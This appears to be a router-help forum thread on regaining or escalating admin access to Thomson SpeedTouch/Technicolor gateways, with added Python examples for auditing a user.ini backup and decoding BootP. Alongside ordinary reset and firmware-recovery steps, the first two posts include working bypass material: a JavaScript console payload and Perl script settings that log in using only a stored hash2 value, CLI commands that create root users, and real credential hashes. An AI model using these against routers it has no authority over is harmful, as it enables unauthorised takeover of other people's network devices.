Modem-Help

Dedicated help on Modems
 

 Fixing Username & Password Problems

Admin

PostSubject: Fixing Username & Password Problems   Tue Mar 24 2015, 09:33

Router config via Web, FTP or Telnet access for ST/TG/TD routers all require 3 items:

  1. The gateway (router) IP address
  2. Username
  3. Password

Web (port 80) access to a router with a blank password will NOT demand a un/pw; FTP (port 21) or Telnet (port 23) will ALWAYS demand a un/pw, even if it is blank.

First the Access IP, then the username / password:

These are the default access IPs:
Quote :

  • http://dsldevice.lan/
  • http://speedtouch.lan/
  • http://192.168.1.254/ (mostly POTS lines)
  • http://10.0.0.138/ (mostly ISDN lines)

All of the above can be changed within the config; the defaults for ISP-supplied models are sometimes different, but not often.

All generic Firmware issued by Thomson since r5.3.0 has default usernames & passwords; the default user is:
Quote :

  • Username: Administrator
  • Password: (blank)(no-password)(just press the <Enter> key)


Update: this has changed on later firmware; see the 4th post for a fuller picture.

Note: the router OS is *nix, which means that both the username & password are cAsE sEnsItIvE.

The user 'Administrator' also has Administrator privileges (see 2nd post), which allows them to do anything & everything from the LAN-side of the router/Gateway. More on this later.

If a SpeedTouch Wizard is used to upgrade/downgrade the firmware, it will by default attempt to copy the router configuration to disk before transfer, then copy it back afterwards. This configuration sits within a text-file called "user.ini", located within the gateway in the '/dl/' directory (that is the only directory that you are allowed to access via FTP). More on this file later.

Problems come with ISP-customised firmware, which often means restricted firmware that stops the user from changing things. Or, of course, you may have an ST from eBay and do not know the password. First, be reassured that ALL cases that I've come across so far are perfectly standard Thomson firmware, but with customised config files that prevent the user from accessing the CLI (telnet), or FTP, or the parts of the router web-interface that allow those config files, etc. to be changed. That, after all, is what the privilege system was designed to do - allow ISPs to lock users out.

So, the issue for those unfortunates that have been lumbered with an ISP that prevents them from changing settings (read: control-freak) boils down to "how do I change the privilege of my username?". Or, more specifically, "how do I give my username an 'Administrator' privilege?". Or, even better, "how can I get a username with a 'SuperUser' privilege?" (I've not yet discovered anything that the 'root' can do that the 'SuperUser' cannot) (the 'SuperUser' can do everything that the 'Administrator' can do--which is everything--from both WAN and LAN sides of the router).

Getting a Username with a SuperUser Privilege:
To do this you need a un/pw with (at least) an Administrator privilege. I'll show how to do that later on for those that have been locked out, but what follows is necessary for later on.

First, find what usernames + privileges you have in the system.

The following is accurate for the ST585v6. Navigate through the router web pages, or try one of the web-addresses below to find out:
Quote :
Home > Toolbox > User Management


  • http://dsldevice.lan/cgi/b/users/ov/?ce=1&be=0&l0=2&l1=8
  • http://speedtouch.lan/cgi/b/users/ov/?ce=1&be=0&l0=2&l1=8
  • http://192.168.1.254/cgi/b/users/ov/?ce=1&be=0&l0=2&l1=8
  • http://10.0.0.138/cgi/b/users/ov/?ce=1&be=0&l0=2&l1=8


MSIE7 has problems with earlier firmware web-pages (use another browser).
(the first address is the default ST IP Address--yours may vary--whilst the second will only work if the router/gateway has the DHCP-server enabled, and your computer is correctly setup to receive LAN-addresses from it)

Pressing <Edit> on the following page will allow the Password to be reset:
Quote :
Home > Toolbox > User Management > Configure


  • http://dsldevice.lan/cgi/b/users/cfg/?ce=1&be=0&l0=2&l1=8
  • http://speedtouch.lan/cgi/b/users/cfg/?ce=1&be=0&l0=2&l1=8
  • http://192.168.1.254/cgi/b/users/cfg/?ce=1&be=0&l0=2&l1=8
  • http://10.0.0.138/cgi/b/users/cfg/?ce=1&be=0&l0=2&l1=8


"resetting" the password makes it the same as the username (remember: case-sensitive).


Next, let's find your router/gateway IP Address:
Quote :
Home > Broadband Connection > Internet Services


  • http://dsldevice.lan/cgi/b/is/?ce=1&be=0&l0=1&l1=1
  • http://speedtouch.lan/cgi/b/is/?ce=1&be=0&l0=1&l1=1
  • http://192.168.1.254/cgi/b/is/?ce=1&be=0&l0=1&l1=1
  • http://10.0.0.138/cgi/b/is/?ce=1&be=0&l0=1&l1=1


This is how to access it from the WAN side.


Save the ST configuration:
Quote :
Home > SpeedTouch > Configuration > Backup & Restore


  • http://dsldevice.lan/cgi/b/bandr/?ce=1&be=0&l0=0&l1=1&tid=BACKUP_RESTORE
  • http://speedtouch.lan/cgi/b/bandr/?ce=1&be=0&l0=0&l1=1&tid=BACKUP_RESTORE
  • http://192.168.1.254/cgi/b/bandr/?ce=1&be=0&l0=0&l1=1&tid=BACKUP_RESTORE
  • http://10.0.0.138/cgi/b/bandr/?ce=1&be=0&l0=0&l1=1&tid=BACKUP_RESTORE


This is the first thing to do after setting up the ST - keep the file somewhere safe.


Open the file ("user.ini") in a text-editor, and search for the section headed "[ mlpuser.ini ]". This is what the Thomson default settings look like:
Code:
[ mlpuser.ini ]
add name=Administrator password=_CYP_d41d8cd98f00b204e9800998ecf8427e role=Administrator hash2=a2e279ed6671666bed7738338c8c849f defuser=enabled
add name=admin password=_CYP_5f4dcc3b5aa765d61d8327deb882cf99 role=Administrator hash2=ff1ac4890f0eb9f4c9d6fbeb1046d3ad
add name=tech password=_CYP_7223e32709118090d359dfa6d6a4d96e role=TechnicalSupport hash2=ee7ec698ec300c9a058b47c402985131 defremadmin=enabled
...and these are the identical Administrator credentials in r8.2.7.7 firmware (585v7) with CYP2 values:
Code:
[ mlpuser.ini ]
add name=Administrator password=_CYP2_d78ddcd540c76991b548ebc39561cfaac32478b903ff10e0 role=Administrator hash2=b6dc35f8f2099445d5aff1f0db7cf265 defuser=enabled
add name=tech password=_CYP2_c230e53984b2aadedf0d7da6b0fb4e36c4c0224103b6b15e role=TechnicalSupport hash2=16a921c357a09b4a38d01c6e7a0bdd1d defremadmin=enabled
(note: this later firmware will still accept the older CYP entries)

The following will give you a different user:
Code:
[ mlpuser.ini ]
add name=su password=_CYP_0b180078d994cb2b5ed89d7ce8e7eea2 role=SuperUser hash2=4ff65b68acecea198d63378b4313e1a9
Quote :
Username: su
Password: su
Privilege: SuperUser
A 2nd method to do exactly the same thing:
Code:
[ mlpuser.ini ]
:user add name="su" password="su" role="SuperUser"

Bingo!

Save the file, and use the same page on the router that originally saved it to restore the new version. Restart the ST/TG, and you are sorted.


r8.4 & later Firmware Password Exploit: (added 10 Oct 2012)
r8.2 & earlier firmware use HTTP Basic authentication in web-config, employing .htm files, with a browser popup for login.

r8.4 & later firmware use the Kepler Project CGILua tool, with Lua pages (.lp files). It can also use the OSGi SDK framework (see r8.4 Release Notes for more info). This setup uses a Lua page for authentication & user switching. Extensive JavaScript is employed.

Thanks to superb research by mpontes, we know that the r8.4 web-config conducts all authentication/password-hashing/etc. at client side. That reveals all hashing secrets, and opens it up to a number of exploits, two of which are given here (note to fledgling web-programmers: clear evidence of what NOT to do in your own projects).

To make use of these exploits, you need knowledge of `hash2' for a root/SuperUser user, either direct from the user.ini or via filesystem dump. Here is an extract from a TG787 r8.4.Z.3 SIP (ISP: MEO) (the 160 byte SMB hashes have been omitted):
Code:
[ mlpuser.ini ]
add name=microuser password=_CYP2_9e1068578d922e177b722e2d9fb77ae2c796d5e998cf94ae role=RootUser hash2=afd39976a1973555831cdcb4309d4034 crypt=jn0Aq5ocIPzCI
(note that MEO has also customised the MLAP roles in this model; the `RootUser' role is equivalent to a `root' role)

The plain-text value for the `microuser' password is still not known for this model+firmware. This exploit renders such knowledge unnecessary. Only the value of hash2 ("afd39976a1973555831cdcb4309d4034") is required. This is how hash2 is derived (from the login.lp JavaScript):
Code:
var HA1 = MD5(user + ":" + realm + ":" + pwd);
...which for the MEO example above part-translates as:
Code:
MD5("microuser:Thomson Gateway:" + pwd)
(Sun May 11, 2014 update for Technicolor TG784n v3 from MEO ISP) (thanks ner0):
Code:
MD5("username:Technicolor Gateway:" + pwd)


First exploit example:
Quote :
Use the PERL script r8.4_exploit.sh. You will need:

  1. A PERL interpreter installed on your computer
  2. Change--as necessary--the value of the top variables in the script:

Code:
# new user is guru / guru (username / password)
# values below come from [ mlpuser.ini ] inside user.ini
# values shown are correct for MEO 8.4.Z.3 tg787
my $router_host = "http://192.168.1.254";       # replace if necessary
my $user = "microuser";                         # replace if necessary (must be root/SuperUser)
my $hash2 = "afd39976a1973555831cdcb4309d4034"; # value of $hash2 for root/SuperUser user
my $new_user = "guru";
my $new_role = "RootUser";                      # value of role for new root/SuperUser user

(after using the script you can then log in as the user `guru')


Second exploit example:
Quote :

  1. Using the browser `Chrome', go to the login page for your router
  2. Open `JavaScript Console' within `Developer Tools'
  3. Paste the following Javascript (replace the first two values) and hit Enter:
    Code:
    var user = "microuser";
    var hash2 = "afd39976a1973555831cdcb4309d4034";

    var HA2 = MD5("GET" + ":" + uri);
    document.getElementById("user").value = user;
    document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +
                           ":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);
    document.authform.submit();

  4. Hopefully, you are now logged in as (in this case) the microuser user
    (now, add a new user at the same level)


Final note on the r8.4 & later exploits: some r8.4+ firmware is not later than r8.4. A good example is the TG782T: the r8.6.x firmware is earlier than r8.4, and uses the original web-authentication methods.


The next post will handle the situation for those that do not have a user that can currently do the operations above, and the 3rd post will be for those that do not know their username and/or password.
_________________
Alex Kemp
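
An added example (not part of the original post, and not Thomson code): a Python audit of a saved user.ini backup that lists the accounts in `[ mlpuser.ini ]` and flags the conditions the post describes. It assumes `_CYP_` is the unsalted MD5 of the password, which matches the blank-password default line above (d41d8c... is the MD5 of an empty string); `_CYP2_` values are reported as unchecked. The `lab` account, the `[ example.ini ]` section and the finding names are constructed for illustration.

```python
import hashlib
import re

# Constructed sample: the three default lines quoted in the post, plus a
# made-up "lab" account whose password equals its username.
SAMPLE_USER_INI = """\
[ example.ini ]
placeholder line from another section (constructed)

[ mlpuser.ini ]
add name=Administrator password=_CYP_d41d8cd98f00b204e9800998ecf8427e role=Administrator hash2=a2e279ed6671666bed7738338c8c849f defuser=enabled
add name=admin password=_CYP_5f4dcc3b5aa765d61d8327deb882cf99 role=Administrator hash2=ff1ac4890f0eb9f4c9d6fbeb1046d3ad
add name=tech password=_CYP_7223e32709118090d359dfa6d6a4d96e role=TechnicalSupport hash2=ee7ec698ec300c9a058b47c402985131 defremadmin=enabled
add name=lab password=_CYP_{lab} role=SuperUser hash2=00000000000000000000000000000000
""".format(lab=hashlib.md5(b"lab").hexdigest())

SECTION_RE = re.compile(r"^\[\s*(.+?)\s*\]$")
# key=value or key="quoted value"
PAIR_RE = re.compile(r'(\w+)=("([^"]*)"|\S*)')
# Roles the post describes as able to do everything on the gateway.
FULL_CONTROL_ROLES = {"SuperUser", "root", "RootUser"}


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def parse_users(text):
    """Return one dict per 'add' line inside the [ mlpuser.ini ] section."""
    users, in_section = [], False
    for raw in text.splitlines():
        line = raw.strip()
        header = SECTION_RE.match(line)
        if header:
            in_section = header.group(1) == "mlpuser.ini"
            continue
        if not in_section:
            continue
        if line.startswith(":user add "):      # the post's second syntax
            line = line[len(":user "):]
        if not line.startswith("add "):
            continue
        fields = {}
        for key, value, quoted in PAIR_RE.findall(line):
            fields[key] = quoted if value.startswith('"') else value
        if "name" in fields:
            users.append(fields)
    return users


def audit_user(user):
    """Return a list of finding labels for one account."""
    findings = []
    name, pw = user["name"], user.get("password", "")
    if pw.startswith("_CYP_"):
        digest = pw[len("_CYP_"):].lower()
        if digest == md5_hex(""):
            findings.append("blank-password")
        elif digest == md5_hex(name):
            findings.append("password-equals-username")
    elif pw.startswith("_CYP2_"):
        findings.append("cyp2-not-checked")    # format not described on the page
    else:
        findings.append("plaintext-password")
        if pw == "":
            findings.append("blank-password")
        elif pw == name:
            findings.append("password-equals-username")
    if user.get("defremadmin") == "enabled":
        findings.append("remote-assistance-account")
    if user.get("role") in FULL_CONTROL_ROLES:
        findings.append("full-control-role")
    if "hash2" in user:
        # On r8.4+ the post shows hash2 alone is enough to log in.
        findings.append("hash2-stored")
    return findings


def audit(text):
    """Map each account name to its findings."""
    return {u["name"]: audit_user(u) for u in parse_users(text)}


if __name__ == "__main__":
    for account, findings in audit(SAMPLE_USER_INI).items():
        print(f"{account:15} {', '.join(findings) or 'no findings'}")
```

Any account reported with `hash2-stored` means the backup file itself should be stored and shared as carefully as the password.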
Admin

PostSubject: Re: Fixing Username & Password Problems   Tue Mar 24 2015, 19:47

There will be some people reading the previous post and grinding their teeth, since their ISP will not let them access certain pages within the router/gateway. Even more annoying, the "Help" button shows all options, even ones that you cannot access!

The links in the first post will allow such folks to see some of these hidden pages, but they will find that they still cannot actually do anything on a hidden page. If this is your situation, this post may help. If not, you will need to turn to the final post.

This method relies on the Remote Assistance page:
Quote:
Home > Toolbox > Remote Assistance

http://192.168.1.254/cgi/b/ras/?ce=1&be=0&l0=2&l1=0
http://speedtouch.lan/cgi/b/ras/?ce=1&be=0&l0=2&l1=0

If MSIE7 keeps putting up the same un/pw box on login, even though the un & pw are correct, try Opera (I can also confirm Mozilla to be OK on r6.1.4.3+)


Under the default Thomson MLAP privilege system, a user with at least 'Administrator' privileges is required to be able to see and activate the above page. That can be changed by the ISP, and there have been many reports of users shut out by their ISP from 'normal' Administrator pages who have access to the 'Remote Assistance' page.

The idea of this page is that it can only be accessed from the WAN side of the router. The idea of that, of course, is that a techie from your ISP logs in and does some-stuff to fix your problems. My experiments show that there is nothing in the default setup to stop YOU from logging in yourself, and giving yourself an 'Administrator'-level new user.

A warning beforehand:
The default Thomson setup does not ask for a password when the page above is accessed; if you are asked for a pw, I cannot help.

Here again is the specific line from the [ mlpuser.ini ] section in the default Thomson-supplied 'user.ini' that enables use of Remote Assistance:
Code:
[ mlpuser.ini ]
...
add name=tech password=_CYP_7223e32709118090d359dfa6d6a4d96e role=TechnicalSupport hash2=ee7ec698ec300c9a058b47c402985131 defremadmin=enabled

...and here are the important parts from the router Remote Assistance page:
Quote:
URL: https://12.3.456.789:51003
Username: tech
Password: mxqd6d28

(I've changed the IP; the default pw changes each time; the connection-window closes after 20 minutes inactivity, or if the router is restarted)

Then:
Quote:
Copy the URL
Click the <Enable Remote Assistance> button
Bring up a new browser window
Paste in the URL and press <Return>
Accept the browser warnings about strange security certificates
Login to the router

The same browser rules about accessing the router from the WAN side (which this is) as from the LAN side apply.

If the ISP-setup prevents you from accessing the WAN side yourself, you can phone-a-friend to try for you, or try an analog dialup account (which will also work). Otherwise, refer to the last-gasp 3rd post method.

Now that you are logged in, add a new user:
Quote:
Home > Toolbox > User Management > New User

http://192.168.1.254/cgi/b/users/cfg/usraccaddrem/?ce=1&be=0&l0=2&l1=8&tid=ADD_USER
http://speedtouch.lan/cgi/b/users/cfg/usraccaddrem/?ce=1&be=0&l0=2&l1=8&tid=ADD_USER

(A TechnicalSupport-level user can add an Administrator-level user, and that is what you want; the password will be the same as the username; remember: case-sensitive)

Afterwards, restart the router, then login under your spiffy new username. Do not forget to gloat, and put two fingers up (or just one if you are American) to your ISP. Also, remember to SAVE YOUR NEW USER.INI! (see first post).

Another method:
If your firmware is r7.4.2 or later, and you can access Telnet, there is another method which may be easier.

This makes use of a privilege-escalation boo-boo within the CLI scripting engine. This is the step-by-step:
Log in to Telnet on the router
Issue the following three commands:
Code:
:script add name addroot command "user add name guru password guru role root descr ROOT"
:script run name addroot pars ""
:saveall
Now use the guru/guru combo to login - all services should be accessible.


Yet another method:
This is the one advised by Thomson (see MLAP Guide r6.2, p63); you need to be able to access Telnet. From the config guide:
Quote:
The default user configuration is implemented in such a way that it does not allow for users with privileges higher than Administrator to be created via the CLI command.

This is how to escape from that bind:
Log in to Telnet on the router
Issue the following command:
Code:
:user flush
Logout.
(at this point, neither un nor pw are required to access either web config or Telnet. From the config pdf):
Quote:
So the next user who logs in will log in as root and, as a result, have all the rights on the Thomson Gateway.
Login to Telnet
(no need to enter username nor password)
Issue the following commands:
Code:
:user add name="my-user-name" password="my-password" role=SuperUser
:saveall
All services should now be accessible with that login.


The last post will be for those that cannot access the router at all (because it rejects the password), or for whom the method(s) above have simply not worked.
_________________
Alex Kemp


Last edited by Admin on Tue Mar 24 2015, 19:51; edited 1 time in total
Admin

PostSubject: Re: Fixing Username & Password Problems   Tue Mar 24 2015, 19:50

This post is for all those people where none of the methods in the first two posts will work.

Be Warned! All the methods outlined below will wipe the current config within your router/gateway. They start out easy, and progressively get a little more difficult, but each one will mean resetting-up the router afterwards to be able to connect with your ISP (plus Wireless, etc. etc.). If you are going to do this, make sure NOW that you have ALL the info that you will later need.


Advice Before Changes:

All methods below reset the router to defaults. One of the main issues is to be able to re-connect to the gateway afterwards, since your ISP may have changed the defaults. Another--really irritating--issue is that Thomson themselves changed the defaults at r5.3.0 (main features also back-ported into v4 firmware at r4.3.2.6). The advised setup therefore changes according to the model of ST that you have, and the Firmware that it is about to run. Tech Support agents always advise a fixed IP on the computer, even though an active DHCP-server is standard on all Gateways (using a fixed IP removes yet another layer of uncertainty):
Quote:
Advised computer network setup before any changes:

r5.3+/r4.3+:
Fixed computer IP (do not use DHCP server on Gateway)
Computer IP: 192.168.1.64
Subnet Mask: 255.255.255.0
Default Gateway IP: 192.168.1.254

Earlier Firmware:
Fixed computer IP (do not use DHCP server on Gateway)
Computer IP: 10.0.0.1
Subnet Mask: 255.0.0.0
Default Gateway IP: 10.0.0.138
General setup advice before Firmware transfer:
Unplug the DSL line.
Disable/turn off ALL firewalls.
Disable/turn off ALL anti-virus.
Use Ethernet connection only.
On Switch models, only use Port 1.
Disconnect any USB connection to Gateway.

Current network info is most easily obtained under Windows using the "ipconfig" command at a command prompt. Here is an example on my ST585v6 at home:
Code:
ipconfig /all

Windows IP Configuration

       Host Name . . . . . . . . . . . . : david
       Primary Dns Suffix  . . . . . . . :
       Node Type . . . . . . . . . . . . : Mixed
       IP Routing Enabled. . . . . . . . : No
       WINS Proxy Enabled. . . . . . . . : No
       DNS Suffix Search List. . . . . . : lan

Ethernet adapter Local Area Connection:

       Connection-specific DNS Suffix  . : lan
       Description . . . . . . . . . . . : Intel(R) 82562V 10/100 Network Connection
       Physical Address. . . . . . . . . : 00-19-D1-47-85-BE
       Dhcp Enabled. . . . . . . . . . . : Yes
       Autoconfiguration Enabled . . . . : Yes
       IP Address. . . . . . . . . . . . : 192.168.1.64
       Subnet Mask . . . . . . . . . . . : 255.255.255.0
       Default Gateway . . . . . . . . . : 192.168.1.254
       DHCP Server . . . . . . . . . . . : 192.168.1.254
       DNS Servers . . . . . . . . . . . : 192.168.1.254
       Lease Obtained. . . . . . . . . . : 03 January 2008 19:30:04
       Lease Expires . . . . . . . . . . : 04 January 2008 19:30:04


Think of your SpeedTouch router/gateway as a specialised micro computer. The OS, program & config files are stored in Flash-ROM, and RAM becomes a working file-system on bootup. Modern r5.3+/r4.3+ routers have a single partition (earlier firmware was dual-partition). Single partition devices have a higher likelihood of corruption in use than dual-partition models, so if a later model gets stopped (including turned off or unplugged) during the boot-sequence, the next time it will start in "BootP"-mode. That means that it is waiting for a BootP-server to respond, and the router is ready to load new firmware. Loading new firmware will completely wipe all of the existing ISP setup and--assuming that you load generic Thomson firmware--will give default usernames & passwords (see top of the very first post). If the methods offered in the first two posts have failed, that is exactly what you want.

The ST Wizards for r5.3+/r4.3+ firmware are BootP- and tFTP-servers (Wizards for earlier firmware are not); the latest version at the time of writing is r4.4.21, and can be used with all r5.3+/r4.3+ firmware up to the latest r7 releases. Have a look under the 'Firmare' directory of your router in the Alcatel downloads directory. The wizards are either pre-packed with firmware, or empty (you can add your choice of firmware in either case). You will be asked to browse to select the firmware for upload during use; pre-packed Wizards have defaults within their setup files that make it easier to find the firmware file. If, for any reason, you do not want to/cannot use the Thomson Wizards, there are some generic BootP & tFTP servers here (pre-r5.3 firmware requires use of this 3rd-party server for the BootP method).

Some firmware releases come in both "file-system" & "bootp" varieties, whilst others only offer the bootp variant. From the previous paragraph it is obvious that what you want is the 'bootp' version. My experience with the Wizards & 585v6 bootp-firmware suggests that it also contains a copy of the file-system software. There is a topic in these forums with all the known firmware releases for every SpeedTouch Router or Gateway; each release is also linked to the download directory that contains it, which should make life easier.

Wizards for pre r5.3-firmware will upload it without regard to any device username/passwords. Wizards for r5.3+/r4.3+ password-protected routers insist on the password being entered before upgrade/downgrading firmware, which explains why the default username has no password.



Three Methods to Wipe the Current Config:

Finally, after that mass of advice, we can get to the methods on how to do it. As best as I can tell, with r5.3+/r4.3+ models Thomson uses identical base-firmware, and all ISP localisations are achieved via configuration changes, including default usernames & passwords. The aim, then, is simply to wipe out the current device configuration. There are 3 ways that this can be achieved, each of increasing difficulty. The ISP config can prevent access to the first method, but cannot stop the last two:


1 Reset the configuration from the Embedded Web-Pages:
Navigate to the Router reset-page, and click "Yes, reset my SpeedTouch" (the following are accurate for the ST585v6 with default r6.1.4.3 firmware):
Quote:
Software Reset:
Home > SpeedTouch > Configuration > Reset

http://192.168.1.254/cgi/b/info/reset/?ce=1&be=0&l0=0&l1=1&tid=RESET
http://speedtouch.lan/cgi/b/info/reset/?ce=1&be=0&l0=0&l1=1&tid=RESET

When complete, you will need to re-setup the router. It contains an "Easy Setup" Wizard to help you do this:

Home > SpeedTouch (click on 'Set Up' within "Pick a task...")

http://192.168.1.254/cgi/b/ST/?ce=1&be=0&l0=0&l1=-1
http://speedtouch.lan/cgi/b/ST/?ce=1&be=0&l0=0&l1=-1


2 Reset the configuration Mechanically:
Thomson refers to the above method as a "Software Reset", whilst this is referred to as a "Hardware Reset" - you can read about both methods within the r5.4 User Guide (p103). Both Software- and Hardware-Resets achieve the same end-result (wiping the current config & restoring to factory defaults). There are 2 varieties of hardware-reset:
Routers with a 'reset' hole at the rear of the device (like mine - see the previous link), usually tucked amongst all the connection sockets.
Routers without a 'reset' hole - check your model User-Guide for the precise method.

Quote:
Hardware Reset:
Devices with a 'reset' hole (see ST-585v6 r5.4 User Guide p103):
Make sure the SpeedTouch is turned on.
Use a pen or an unfolded paperclip to push the recessed reset button on the back panel. Push it until the power LED lights red - this will take about 7 seconds.
Release the reset button.
The SpeedTouch restarts in default configuration.
Devices without a 'reset' hole (check your model for the method; an example is ST510/530v4 r4.3):
Make sure the SpeedTouch is powered on.
Power off the SpeedTouch by pressing the power button until all LEDs turn off.
Press the power button once again (shortly).
As soon as the Power/System LED is flashing green, press the power button once more (shortly).
The Power/System LED stops flashing to become solid green. After six seconds, it starts flashing green again. Press the power button once more (shortly).
All LEDs flash green once.
The SpeedTouch reboots and will come online with factory default settings.

When complete, you will need to re-setup the router, exactly as with the 'Software Reset' above.


3 Use BootP to load default Firmware:
This has been devised by Thomson as a last-gasp method to get a device operational again that is otherwise utterly FOOBAR-ed. If you consider that your ST is (actually or effectively) totally FOOBAR, and none of the steps above work, this is the one for you.

In Thomson's words, from the r4.2.7 ST510/530v4 Setup and User’s Guide:
Quote:
'BootP' is "a standard mechanism used for booting diskless stations".
You will therefore understand that the BootP-state for the Gateway occurs before transfer of control to the on-board firmware, and that neatly escapes from the catch-22 of needing to know the password with r5.3+/r4.3+ devices before you can upload the firmware.

The basic procedure is as follows:
Have an assembly of:
combo BootP+tFTP-server
firmware
...prepared ready on a computer attached by ethernet to the router/gateway.
Put the router into BootP mode.
Watch the firmware transfer across the wire, and the router restart.
(sounds easy, huh?)

As with some of the other methods, this one varies according to model & firmware:

With pre-r5.3/r4.3 models:
A 3rd-party BootP & tFTP server is needed, since the Alcatel/Thomson Wizard will not work.
The router MAC address is needed (for the bootp-server) (update: not with Jounin, see following).
The method to get the gateway into BootP-mode differs from later firmware (again, check the User-Manual for your model for the precise method).

With r5.3+/r4.3+ models:
3rd-party BootP & tFTP servers will work if the Thomson Wizard fails.
The Wizard is reliably reported to be a BootP-server.
The method to get the gateway into BootP-mode differs to earlier firmware, and is not documented by Thomson anywhere (except indirectly).

Revs Per Min reports that the Jounin tFTP server does not need a MAC address. Here is his report on how to upgrade a bricked ST536v5 using Jounin:
Quote:
Download a tftp server. I used tftpd32.exe from tftpd32.jounin.net
Free and very neat. It has a bootp server in it. No install just start the exe.
I used the v3 beta but earlier version should be ok.

Plug in the modem no phone connection. Set a static ip on the pc ethernet of 10.0.0.10.
Now start the tftpd32 and go to the DHCP server tab.

Start address 10.0.0.138
pool size 1
bootfile zztxaa5334.bin (put the firmware file in same directory as the tftpd32 and use whatever one you have.)
wins blank
default router blank
mask 255.0.0.0

Then click the save.
Check the server interface is set to 10.0.0.10.
Go to the Event viewer. Start the modem again in bootp mode.
You should see the requests for ip, the ip passed to the modem and immediately start to download the firmware into the modem.

DO NOT SHUT OFF THE MODEM.
During the upload the power light will go to solid red and the ethernet flash. Once the transfer is made it will flash red to green. You don't need to do anything. The speedtouch will check the file and load it into flash and reboot itself. The modem should just come up with green power light.
Then change your ethernet back to auto.
Go through the gui and fill out the setup wizard.

This was the event viewer log.
Rcvd BootP Msg for IP 0.0.0.0, Mac 00:0E:50:CA:55:C2 [26/05 17:28:15.001]
DHCP: proposed address 10.0.0.138 [26/05 17:28:15.011]
Rcvd BootP Msg for IP 0.0.0.0, Mac 00:0E:50:CA:55:C2 [26/05 17:28:15.992]
DHCP: proposed address 10.0.0.138 [26/05 17:28:16.002]
Read request for file <zztxaa540e.bin>. Mode octet [26/05 17:28:16.233]
Using local port 1143 [26/05 17:28:16.233]
Rcvd DHCP Rqst Msg for IP 0.0.0.0, Mac 00:11:D8:BA:DB:D5 [26/05 17:28:18.736]
<zztxaa540e.bin>: sent 4100 blks, 2098763 bytes in 25 s. 0 blk resent [26/05 17:28:41.629]

If you need the MAC address:
Quote:
One obvious place to look is the label on the ST (usually fixed to the base of the device); on my 585v6 it is at the top LHS, underneath the 2nd bar-code.

Another place to confirm it is from the embedded web-pages:
Pre-r5.3/r4.3 models (the example comes from the r4.2.7 ST510/530v4 Setup and User’s Guide p47):

Home > System tab (Physical Address)

http://10.0.0.138/

The Physical Address shown is described by Thomson as "The unique Medium Access Control (MAC) address of your SpeedTouch" (I thought that it was "Media Access Control").

r5.3+/r4.3+ models: It cannot be found on the web-pages (humph).

The MAC address is one of the environment variables (_MACADDR) & can be found with the CLI command "env list".

To put the Router/Gateway into BootP mode:
Quote:
Varies by Firmware (possibly by model - check your User Guide):
Pre-r5.3/r4.3 models with reset (the example comes from the r5.2.7 ST510/530/516/536/546v5 Setup and User’s Guide p73, and is largely mirrored by a copy of a post from a NZ SpeedTouch Rep in the Whirlpool Forums):
Start with the SpeedTouch switched off.
Use a pencil to press and hold the recessed reset button on the SpeedTouch rear panel.
While holding the reset button, push in the power button to switch on the SpeedTouch. You will notice that the power LED is solid red.
Keep holding the reset button for at least twelve seconds until the power LED turns solid green.
Release the reset button as soon as the power LED turned solid green. This indicates that the SpeedTouch entered BOOTP mode and is sending BOOTP requests.

Pre-r5.3/r4.3 models without reset (the example comes from the r4.2.7 ST510/530v4 Setup and User’s Guide p68):
Start with the SpeedTouch switched off.
Press the SpeedTouch power button and hold it until the Power/System LED flashes amber (approximately six seconds). This indicates that the SpeedTouch entered BOOTP mode and is sending BOOTP requests.

r5.3+/r4.3+ models: Not directly documented (humph).

The r6.2.F Release Notes contain a clue (p14):
Quote:
If the ST is shut down during boot, it gets stuck in BOOTP mode. This is actually not a restriction as such, but the normal result of a feature. When the ST changed from dual to single partition routers, a backup plan was necessary in case the active (and only) build would get corrupted, or in case the modem couldn't start. The BootP mechanism was implemented to recover from such a situation. This mode allows the routers to be always recoverable, by having the router entering BootP mode. The router then expects a BootP server, with a TFTP server to upload a new build.

To succeed, the router must be able to detect when the booting has failed. If the modem detects that it did not finish its boot sequence completely, it will enter BootP mode. A side-effect of this mechanism is that, if you unplug (or turn off in any way) a router during its boot sequence, it will start in BootP the next time.

The following is pure theory; at this moment I cannot persuade my ST585v6 to do it!:
Quote:
r5.3+/r4.3+ models:
Start with the SpeedTouch switched off.
Press the SpeedTouch power button.
Press and switch OFF the router whilst the Power/System LED still shows red (or amber, the User Guides vary).
On next startup the Power/System LED will display solid red (or flashing amber, the User Guides vary). This indicates that the SpeedTouch entered BOOTP mode and is sending BOOTP requests.
Now run the SpeedTouch firmware upgrade wizard.

Sat update: this is how to put a ST-585v6 into BootP mode:
Quote:
Start with the SpeedTouch switched off.
Use the end of a paperclip to press and hold the recessed reset button on the SpeedTouch rear panel.
While holding the reset button, push in the power button to switch on the SpeedTouch. You will notice that the power LED is solid red.
Keep holding the reset button for at least ?? seconds until the power LED turns solid orange.
Now release the reset button. The router is in BootP mode and is sending BootP requests.

This was the sequence with Jounin to send ZZQIAA6.2F5.bli to the router:
Quote:
(Before switching the 585v6 into BootP mode):
Put all 3 files from Jounin into its own directory, including 'tftpd32.exe' (no installation required) + the bootp-firmware-file.
Setup the computer for a static IP as top of this post (Properties on TCP/IP within Network Adapter Properties).
Start the tftpd32 and go to the DHCP server tab:
IP Pool starting address: 192.168.1.254
Size of pool: 1
Boot File: ZZQIAA6.2F5.bli
Mask: 255.255.255.0
Everything else blank.
Click 'Save'.
Make sure "Server interfaces" says '192.168.1.64'.
Close Jounin (when my 585 started BootP-mode it threw an exception on the computer, and I had to restart it).
(Dec 2008 update: the latest v3.28 is trouble-free, so there is no need to shutdown/restart Jounin).



(do the sequence as above to start BootP-mode with the router)
Restart Jounin.
Watch the file transfer.
Router restarts; power-LED stays orange for a long time (do NOT switch it off now!!!)
Router restarts again, with a normal sequence this time.
Router has factory defaults & will require upload of previous-saved config file, or use of embedded Wizard.

2008-12-11 edit: added Jounin image + news on v3.28 update
_________________
Alex Kemp


Last edited by Admin on Tue Mar 24 2015, 19:52; edited 1 time in total
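Added example (not part of the original post, and not Thomson or tftpd32 code): the BootP exchange that the recovery sequence above relies on, decoded with the fixed RFC 951 packet layout. The request's MAC address and transaction id are constructed sample values; the addresses and boot file name are the ones entered into the DHCP server tab in the post. Only plain BOOTP is modelled; any DHCP options a real server appends are left out.

```python
import socket
import struct

# Fixed BOOTP layout (RFC 951): 300 bytes in total.
BOOTP = struct.Struct("!BBBBIHH4s4s4s4s16s64s128s64s")
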